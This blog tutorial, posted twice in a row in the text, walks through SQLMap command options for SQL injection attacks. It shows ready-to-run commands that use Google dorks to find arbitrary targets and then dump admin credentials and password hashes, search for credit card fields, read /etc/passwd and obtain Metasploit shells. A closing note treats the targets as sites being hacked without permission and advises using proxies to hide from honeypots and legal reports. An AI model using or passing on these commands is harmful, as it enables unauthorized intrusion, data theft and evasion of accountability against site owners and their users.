Hi,
So, here I want to post little about how to use SQLMap in practice.
In my previous post, I’ve shown you how to install SQLMap from GitHub and learn the command options that used most on injection attack.
I’ll start directly from the injection attack samples that used the most command options, so you can practice it further by yourself later.
If you haven’t installed SQLMap, you can read my previous post here:
https://www.blogger.com/blogger.g?blogID=3236000309080110099#editor/target=post;postID=6390705995461280716;onPublishedMenu=allposts;onClosedMenu=allposts;postNum=0;src=postname
# Start SQLMap
$ ./sqlmap.py --update
$ ./sqlmap.py
$ ./sqlmap.py -hh
1. Command option -u
Let’s say, we have target something like:
http://www.domain.com/article.php?id=7
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs
–random-agent: using random browser agent (Firefox, IE, Opera, etc..)
–level: level of injection test to perform (1..5)
–risk: level of injection risk to perform (1..3)
–threads: count of injection attack process thread. Using high number of thread will make the injection attack process run fast, especially in Union, Boolean, Error, Stacked, and Query based type, but avoid using more than 1 thread in Time-based attack.
–batch: make the injection process run automatically, without user input.
–dbs: get database info
That command above will perform attack alternately based on BEUSTQ (Boolean, Error, Union, Stacked, Query, Time), by default. To focus the attack with spesific attack technique, you can set it in the injection command, for example when you do manual injection to this target by doing something like this:
http://www.domain.com/article.php?id=7'
http://www.domain.com/article.php?id=7 and 1=0
and you see there’s an SQL error message on the page, then you might want to set the attack technique with option: –tech=E
Otherwise, if you see nothing, but you are quite sure that there’s an injection point on that page or just want to test the injection, you can leave it the attack technique type to be unset.
2. Command option -g (crawl potential targets from Google results)
With the -g option, we can crawl any potential targets from Google results based on the dork inputted.
Injection command:
$ ./sqlmap.py -g "intext:article.php?id=" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs
To crawl from certain site based on where the country domain registered, eg: .com.sg
$ ./sqlmap.py -g "intext:article.php?id= + site:.com.sg" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs
Ofcourse, you can use any other Google dorks as you wish.
If you see no attack being processed, that means there is no potential injection point that can be injected. Potential injection point of the URL link should contains at least one GET parameter, eg: .php?id=, .asp?pid=, etc..
3. Command option –crawl
Injection command:
$ ./sqlmap.py -u "http://www.domain.com" --random-agent --level 2 --risk 2 --threads 5 --batch --crawl=3 --dbs
That command above will crawl to every links found in certain website and will inject link which has GET parameter in it.
–crawl: crawl through every links in a website page. We use –crawl=3 means it will crawl deeply till the depth of “3″.
For example:
http://www.domain.com, has a menu link called “articles”.
Depth 1: http://www.domain.com/articles
Depth 2: http://www.domain.com/articles/newest/
Depth 3: http://www.domain.com/articles/newest/funny-topics/
Depth 4: http://www.domain.com/articles/newest/funny-topics/author/
Our option –crawl=3 will crawl any links found in depth 1, 2, and 3, but not depth 4. Okay, hope you understand.
You are free to set any crawl depth as you want. But, remember the more you set the crawl depth, the more you will get many links to inject (if it has GET parameter).
4. Command option –forms
Injection command:
$ ./sqlmap.py -u "http://www.domain.com" --random-agent --level 2 --risk 2 --threads 5 --batch --forms --dbs
That command above will try to search for any POST form in the website page. For example: in homepage there will be some forms like search, login forms, etc.
But, how if the POST form are in another page deeply in the website and we don’t know where it is? We can join with the previous command –crawl.
$ ./sqlmap.py -u "http://www.domain.com" --random-agent --level 2 --risk 2 --threads 5 --batch --crawl=3 --forms --dbs
5. Command option –proxy
The proxy option format is: (http|https|socks4|socks5)://url:port
Find some working IP proxy and port, eg: http://hidemyass.com/proxy-list
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --proxy="https://123.123.123.123:3128" --dbs
6. Command option –dbms
Suppose that we’re pretty sure that the target website uses database type MySQL. We can set it in the command with option –dbms=mysql, so that it will be faster in injection attack, rather than rotate through all of database types, like Oracle, MSSQL, etc.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --forms --dbms=mysql --dbs
7. Command option -D, -T, -C
-D: dump database
-T: dump table
-C: dump column
Let’s say we got database name like: sitedb.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T
That command above will enumarate all tables name from certain database that is “sitedb”.
Let’s say we got 15 tables name, one of them is: admin. And we want to enumerate for its columns name.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin -C
That command above will enumarate all columns name from certain database that is “sitedb” and table “admin”.
Let’s say we got 6 columns name, eg: id, admin_id, admin_pass, admin_fullname, admin_mail, admin_level.
We want to dump all the data in table “admin”.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin --dump
Or if you want to dump only certain columns, like “admin_id” and “admin_pass”.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin -C admin_id,admin_pass --dump
8. Command option –answers
This option is vry useful if you want the attack process run 100% automatically without any user input.
For example, when you are dumping data from certain table (see command option 6 above), SQLMap will automatically try to crack any string that has format like “password hash”.
Eg:
In dumping the table “admin”, you got 3 record rows, those are:
admin:0cc175b9c0f1b6a831c399e269772661
manager:92eb5ffee6ae2fec3ad71c777531578f
staf:4a8a08f09d37b73795649038408b5f33
Since it found field data like “0cc175b9c0f1b6a831c399e269772661″ which has format like MD5-hash, SQLMap will try to crack it automatically using wordlist in dir “txt”. Cracking 3 hashes with only few wordlist, would take a short time. But what if the hashes found are about 10,000 records and the wordlist count is more than 100,000,000 lines?? Wouldn’t it take long time to wait.
The best idea is dump all data first, then the cracking process can be done later separately. For this purpose, we can use command option –answers, to make SQLMap skip “cracking” process.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin -C admin_id,admin-pass --dump --answers="crack=N"
–answer=”crack=N”, we take certain unique particular string from the cracking question, that is “crack”, and we set it to “N” = No.
9. Command option –flush-session
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs --flush-session
That command above will make SQLMap to flush all sessions found from previous injection targetted to certain website. This is very useful when you do injection with T (Time) based attack, as sometimes there’s a lagging connection to the target website.
But, be careful using –flush-session, as it will delete all injection sessions and file for that target. This option means the next injection process will start from zero, as if we never inject the target before.
10. Command option –hex
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin -C admin_id,admin-pass --dump --hex --tech=T
Using –hex option is very useful when the injection process uses T (Time) based. Means that the data being retrieved are converted to HEX (hexadecimal) digits before it starts to deliver. This also to avoid any strange characters being retrieved.
11. Command option –no-cast
“cast” function in MySQL means, to convert a string to a different character set.
Eg:
SELECT CAST(_latin1'test' AS CHAR CHARACTER SET utf8);
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs --no-cast
Note that, we can’t join between –no-cast and –hex option. We have to choose one of them in a command.
12. Command option –dump-all
To dump all databases found, but exclude “information_schema” DB or exclude DBMS system database.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --dump-all --exclude-sysdbs
13. Command option –count
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin --count
To count records/rows in a certain table. Very useful if you want to check how many records/rows in a table before dumping it.
14. Command option –start, –end
Let’s say we found table “member” and there are about 24,000 records in it. And we want to dump start from record “1000″ to “2000″.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T member --dump --answers="crack=N" --start=1000 --end=2000
15. Command option –search
Let’s say there are about 90 tables in a certain database, and we want to short our time looking for table contains certain “field name”. Eg: credit_card_type.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb --search="credit_card_type"
It will search through the whole tables in database “sitedb” and find for field name “credit_card_type”.
16. Command option –delay
This option –delay sometime used with T (Time) based attack type, to avoid lagging connection from/to the target and to retrieve data precisely.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --batch --dbs --delay=5 --tech=T
Note, when we use –delay in Time based attack type, there is no “thread” being set. Thread is only 1, by default.
–delay=5, means delay between one attack to next attack is 5 seconds.
17. Command option –common-tables, –common-columns
Suppose we got database name “sitedb”, the database type is MySQL version 4.0. As we know that MySQL version 4 doesn’t have “information_schema” system database, so it will be hard to enumerate the tables/columns name. We gonna use “fuzzing/bruteforcing” technique to get the table and column name.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb --common-tables
That command above will try to bruteforce for the table name based on the tables name list.
Let’s say we have found one table, eg: member. But we don’t have any idea what the column name is. Next, we gonna bruteforce for the column name.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb --common-columns
That command above will try to bruteforce for the column name based on the columns name list.
18. Command option –sql-shell
To prompt for an interactive SQL shell command.
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --sql-shell
It will show an interactive SQL shell command.
For example, we want to make SQL query from table “admin”.
> select count(*) from admin;
You can also use –sql-query directly from the injection command, eg:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --sql-query="select count(*) from admin"
19. Command option –msf-path
To prompt a shell which relates to MSF (Metasploit) Framework. Install MSF first before using this command option.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --msf-path="the_MSF_path_where_it_is_installed"
20. Command option –file-read
To read any (readable) file in the server.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --file-read="/etc/passwd"
21. Command option –tamper
To use tamper for the injection attack. For example, we want to give the injection attack with string “+” for any space character in it. Means it will convert all spaces with string “+”.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs --tamper tamper/space2plus.py
To short the command for tamper link, you can set shortcut link for all tamper scripts in dir “tamper”.
$ ln -s tamper/space2plus.py space2plus.py
Do the same for other tamper scripts you want to make shortcut for it.
22. Command option –users, –passwords, –roles, –privileges, –is-dba
–users: to enumerate all database users
–passwords: to enumerate all database paswords for each of the users
–roles: to enumerate all roles for each of the users
–privileges: to enumerate all privileges for each of the users
–is-dba: to check whether the current database user is a Database Administrator or not
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --users --passwords --roles --privileges --is-dba
Useful if you want to check whether the current database user is a DB Administrator or not, or to check the user has “write” privilege or not. If the user has “write” privilege, then we might has chance to write file on the server. It’s just like “mysql_into_outfile” command.
Okay, I think that’s enough for this post. I’m so sleepy and want to take a rest.
Good luck with your injection.
Note:
- If you do injection with SQLMap from VPS (Virtual Private Server) and process google results, be careful .. sometimes you don’t realize that the target site you’re attacked is a “honeypot“. It’s a trap usually set by security company or internet monitoring company. Once you’re trapped in the honeypot server, it will record all your injection/hacking activities and your IP. Then, the company authority will file for legal report to your hosting company, and you gonna get warning from them very soon. You’re lucky if you only get warning, but if you do that many times, hosting company may block/suspend your VPS service because of illegal activities. So, just be careful with the target you’re trying to hack, you can use proxy IP to cover your real IP.
So, here I want to post little about how to use SQLMap in practice.
In my previous post, I’ve shown you how to install SQLMap from GitHub and learn the command options that used most on injection attack.
I’ll start directly from the injection attack samples that used the most command options, so you can practice it further by yourself later.
If you haven’t installed SQLMap, you can read my previous post here:
https://www.blogger.com/blogger.g?blogID=3236000309080110099#editor/target=post;postID=6390705995461280716;onPublishedMenu=allposts;onClosedMenu=allposts;postNum=0;src=postname
# Start SQLMap
$ ./sqlmap.py --update
$ ./sqlmap.py
$ ./sqlmap.py -hh
1. Command option -u
Let’s say, we have target something like:
http://www.domain.com/article.php?id=7
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs
–random-agent: using random browser agent (Firefox, IE, Opera, etc..)
–level: level of injection test to perform (1..5)
–risk: level of injection risk to perform (1..3)
–threads: count of injection attack process thread. Using high number of thread will make the injection attack process run fast, especially in Union, Boolean, Error, Stacked, and Query based type, but avoid using more than 1 thread in Time-based attack.
–batch: make the injection process run automatically, without user input.
–dbs: get database info
That command above will perform attack alternately based on BEUSTQ (Boolean, Error, Union, Stacked, Query, Time), by default. To focus the attack with spesific attack technique, you can set it in the injection command, for example when you do manual injection to this target by doing something like this:
http://www.domain.com/article.php?id=7'
http://www.domain.com/article.php?id=7 and 1=0
and you see there’s an SQL error message on the page, then you might want to set the attack technique with option: –tech=E
Otherwise, if you see nothing, but you are quite sure that there’s an injection point on that page or just want to test the injection, you can leave it the attack technique type to be unset.
2. Command option -g (crawl potential targets from Google results)
With the -g option, we can crawl any potential targets from Google results based on the dork inputted.
Injection command:
$ ./sqlmap.py -g "intext:article.php?id=" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs
To crawl from certain site based on where the country domain registered, eg: .com.sg
$ ./sqlmap.py -g "intext:article.php?id= + site:.com.sg" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs
Ofcourse, you can use any other Google dorks as you wish.
If you see no attack being processed, that means there is no potential injection point that can be injected. Potential injection point of the URL link should contains at least one GET parameter, eg: .php?id=, .asp?pid=, etc..
3. Command option –crawl
Injection command:
$ ./sqlmap.py -u "http://www.domain.com" --random-agent --level 2 --risk 2 --threads 5 --batch --crawl=3 --dbs
That command above will crawl to every links found in certain website and will inject link which has GET parameter in it.
–crawl: crawl through every links in a website page. We use –crawl=3 means it will crawl deeply till the depth of “3″.
For example:
http://www.domain.com, has a menu link called “articles”.
Depth 1: http://www.domain.com/articles
Depth 2: http://www.domain.com/articles/newest/
Depth 3: http://www.domain.com/articles/newest/funny-topics/
Depth 4: http://www.domain.com/articles/newest/funny-topics/author/
Our option –crawl=3 will crawl any links found in depth 1, 2, and 3, but not depth 4. Okay, hope you understand.
You are free to set any crawl depth as you want. But, remember the more you set the crawl depth, the more you will get many links to inject (if it has GET parameter).
4. Command option –forms
Injection command:
$ ./sqlmap.py -u "http://www.domain.com" --random-agent --level 2 --risk 2 --threads 5 --batch --forms --dbs
That command above will try to search for any POST form in the website page. For example: in homepage there will be some forms like search, login forms, etc.
But, how if the POST form are in another page deeply in the website and we don’t know where it is? We can join with the previous command –crawl.
$ ./sqlmap.py -u "http://www.domain.com" --random-agent --level 2 --risk 2 --threads 5 --batch --crawl=3 --forms --dbs
5. Command option –proxy
The proxy option format is: (http|https|socks4|socks5)://url:port
Find some working IP proxy and port, eg: http://hidemyass.com/proxy-list
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --proxy="https://123.123.123.123:3128" --dbs
6. Command option –dbms
Suppose that we’re pretty sure that the target website uses database type MySQL. We can set it in the command with option –dbms=mysql, so that it will be faster in injection attack, rather than rotate through all of database types, like Oracle, MSSQL, etc.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --forms --dbms=mysql --dbs
7. Command option -D, -T, -C
-D: dump database
-T: dump table
-C: dump column
Let’s say we got database name like: sitedb.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T
That command above will enumarate all tables name from certain database that is “sitedb”.
Let’s say we got 15 tables name, one of them is: admin. And we want to enumerate for its columns name.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin -C
That command above will enumarate all columns name from certain database that is “sitedb” and table “admin”.
Let’s say we got 6 columns name, eg: id, admin_id, admin_pass, admin_fullname, admin_mail, admin_level.
We want to dump all the data in table “admin”.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin --dump
Or if you want to dump only certain columns, like “admin_id” and “admin_pass”.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin -C admin_id,admin_pass --dump
8. Command option –answers
This option is vry useful if you want the attack process run 100% automatically without any user input.
For example, when you are dumping data from certain table (see command option 6 above), SQLMap will automatically try to crack any string that has format like “password hash”.
Eg:
In dumping the table “admin”, you got 3 record rows, those are:
admin:0cc175b9c0f1b6a831c399e269772661
manager:92eb5ffee6ae2fec3ad71c777531578f
staf:4a8a08f09d37b73795649038408b5f33
Since it found field data like “0cc175b9c0f1b6a831c399e269772661″ which has format like MD5-hash, SQLMap will try to crack it automatically using wordlist in dir “txt”. Cracking 3 hashes with only few wordlist, would take a short time. But what if the hashes found are about 10,000 records and the wordlist count is more than 100,000,000 lines?? Wouldn’t it take long time to wait.
The best idea is dump all data first, then the cracking process can be done later separately. For this purpose, we can use command option –answers, to make SQLMap skip “cracking” process.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin -C admin_id,admin-pass --dump --answers="crack=N"
–answer=”crack=N”, we take certain unique particular string from the cracking question, that is “crack”, and we set it to “N” = No.
9. Command option –flush-session
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs --flush-session
That command above will make SQLMap to flush all sessions found from previous injection targetted to certain website. This is very useful when you do injection with T (Time) based attack, as sometimes there’s a lagging connection to the target website.
But, be careful using –flush-session, as it will delete all injection sessions and file for that target. This option means the next injection process will start from zero, as if we never inject the target before.
10. Command option –hex
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin -C admin_id,admin-pass --dump --hex --tech=T
Using –hex option is very useful when the injection process uses T (Time) based. Means that the data being retrieved are converted to HEX (hexadecimal) digits before it starts to deliver. This also to avoid any strange characters being retrieved.
11. Command option –no-cast
“cast” function in MySQL means, to convert a string to a different character set.
Eg:
SELECT CAST(_latin1'test' AS CHAR CHARACTER SET utf8);
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs --no-cast
Note that, we can’t join between –no-cast and –hex option. We have to choose one of them in a command.
12. Command option –dump-all
To dump all databases found, but exclude “information_schema” DB or exclude DBMS system database.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --dump-all --exclude-sysdbs
13. Command option –count
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin --count
To count records/rows in a certain table. Very useful if you want to check how many records/rows in a table before dumping it.
14. Command option –start, –end
Let’s say we found table “member” and there are about 24,000 records in it. And we want to dump start from record “1000″ to “2000″.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T member --dump --answers="crack=N" --start=1000 --end=2000
15. Command option –search
Let’s say there are about 90 tables in a certain database, and we want to short our time looking for table contains certain “field name”. Eg: credit_card_type.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb --search="credit_card_type"
It will search through the whole tables in database “sitedb” and find for field name “credit_card_type”.
16. Command option –delay
This option –delay sometime used with T (Time) based attack type, to avoid lagging connection from/to the target and to retrieve data precisely.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --batch --dbs --delay=5 --tech=T
Note, when we use –delay in Time based attack type, there is no “thread” being set. Thread is only 1, by default.
–delay=5, means delay between one attack to next attack is 5 seconds.
17. Command option –common-tables, –common-columns
Suppose we got database name “sitedb”, the database type is MySQL version 4.0. As we know that MySQL version 4 doesn’t have “information_schema” system database, so it will be hard to enumerate the tables/columns name. We gonna use “fuzzing/bruteforcing” technique to get the table and column name.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb --common-tables
That command above will try to bruteforce for the table name based on the tables name list.
Let’s say we have found one table, eg: member. But we don’t have any idea what the column name is. Next, we gonna bruteforce for the column name.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb --common-columns
That command above will try to bruteforce for the column name based on the columns name list.
18. Command option –sql-shell
To prompt for an interactive SQL shell command.
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --sql-shell
It will show an interactive SQL shell command.
For example, we want to make SQL query from table “admin”.
> select count(*) from admin;
You can also use –sql-query directly from the injection command, eg:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --sql-query="select count(*) from admin"
19. Command option –msf-path
To prompt a shell which relates to MSF (Metasploit) Framework. Install MSF first before using this command option.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --msf-path="the_MSF_path_where_it_is_installed"
20. Command option –file-read
To read any (readable) file in the server.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --file-read="/etc/passwd"
21. Command option –tamper
To use tamper for the injection attack. For example, we want to give the injection attack with string “+” for any space character in it. Means it will convert all spaces with string “+”.
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs --tamper tamper/space2plus.py
To short the command for tamper link, you can set shortcut link for all tamper scripts in dir “tamper”.
$ ln -s tamper/space2plus.py space2plus.py
Do the same for other tamper scripts you want to make shortcut for it.
22. Command option –users, –passwords, –roles, –privileges, –is-dba
–users: to enumerate all database users
–passwords: to enumerate all database paswords for each of the users
–roles: to enumerate all roles for each of the users
–privileges: to enumerate all privileges for each of the users
–is-dba: to check whether the current database user is a Database Administrator or not
Injection command:
$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --users --passwords --roles --privileges --is-dba
Useful if you want to check whether the current database user is a DB Administrator or not, or to check the user has “write” privilege or not. If the user has “write” privilege, then we might has chance to write file on the server. It’s just like “mysql_into_outfile” command.
Okay, I think that’s enough for this post. I’m so sleepy and want to take a rest.
Good luck with your injection.
Note:
- If you do injection with SQLMap from VPS (Virtual Private Server) and process google results, be careful .. sometimes you don’t realize that the target site you’re attacked is a “honeypot“. It’s a trap usually set by security company or internet monitoring company. Once you’re trapped in the honeypot server, it will record all your injection/hacking activities and your IP. Then, the company authority will file for legal report to your hosting company, and you gonna get warning from them very soon. You’re lucky if you only get warning, but if you do that many times, hosting company may block/suspend your VPS service because of illegal activities. So, just be careful with the target you’re trying to hack, you can use proxy IP to cover your real IP.